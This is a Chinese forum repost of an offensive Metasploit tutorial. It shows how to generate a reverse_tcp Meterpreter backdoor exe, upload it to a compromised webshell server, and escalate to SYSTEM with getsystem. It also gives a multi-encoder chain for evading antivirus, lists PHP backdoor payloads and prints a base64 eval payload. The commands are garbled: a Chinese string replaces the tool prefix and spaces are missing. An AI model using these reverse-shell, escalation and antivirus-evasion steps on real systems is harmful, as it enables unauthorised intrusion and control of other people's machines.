使用Metasploit进行权限提升

[复制链接]
查看363 | 回复0 | 2012-4-1 19:21:41 | 显示全部楼层 |阅读模式
首先我虚拟机的APACHE是以非系统权限启动的

我们来生成一个Door
root@Dis9Team:~$sudom单机传奇payloadwindows/meterpreter/reverse_tcpLHOST=192.168.1.1LPORT=4444x>/var/www/door.exe

[sudo]passwordforbrk:

Createdbym单机传奇payload(http://www.metasploit.com).

Payload:windows/meterpreter/reverse_tcp

Length:290

Options:{"LHOST"=>"192.168.1.1","LPORT"=>"4444"}
然后上传到WEBSHELL服务器运行,metasploit本地监听

看终端成功去定了SHELL

你可以用强大的meterpreter会话帮你权限提升,他会自动运行从古到今的本地EXP360的也有哦:
meterpreter>getuid

Serverusername:DIS9TEAM-5FA711apache==>不是系统权限

meterpreter>getsystem==>运行一个命令

...gotsystem(viatechnique4).

meterpreter>getuid

Serverusername:NTAUTHORITYSYSTEM==>传说种的溢出

meterpreter>
 

如果安全了杀毒软件你也可以BYPASS
m单机传奇payloadwindows/meterpreter/reverse_tcpLHOST=127.0.0.1LPORT=21R|./m单机传奇encode-ex86/call4_dword_xor-traw-c5|./m单机传奇encode-ex86/countdown-traw-c5|./m单机传奇encode-ex86/fnstenv_mov-traw-c5|./m单机传奇encode-ex86/jmp_call_additive-traw-c5|./m单机传奇encode-texe-c5>/tmp/5x.exe
如果你嫌弃EXE露点你也可以生成脚本后门:
root@Dis9Team:/tmp/#m单机传奇payload-l|grepphp

php/bind_perlListenforaconnectionandspawnacommandshellviaperl(persistent)

php/bind_perl_ipv6Listenforaconnectionandspawnacommandshellviaperl(persistent)overIPv6

php/bind_phpListenforaconnectionandspawnacommandshellviaphp

php/bind_php_ipv6Listenforaconnectionandspawnacommandshellviaphp(IPv6)

php/download_execDownloadanEXEfromanHTTPURLandexecuteit

php/execExecuteasinglesystemcommand

php/meterpreter/bind_tcpListenforaconnection,RunameterpreterserverinPHP

php/meterpreter/reverse_tcpReversePHPconnectbackstagerwithcheck单机传奇ordisabledfunctions,RunameterpreterserverinPHP

php/meterpreter_reverse_tcpConnectbacktoattackerandspawnaMeterpreterserver(PHP)

php/reverse_perlCreatesaninteractiveshellviaperl

php/reverse_phpReversePHPconnectbackshellwithcheck单机传奇ordisabledfunctions

php/shell_findsock



 m单机传奇payload(bind_php)>generate-traw-ephp/base64

eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIGSNIP-->



&nbsp;原文&nbsp;http://www.dis9.com/metasploit-privilege-escalation.html

*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则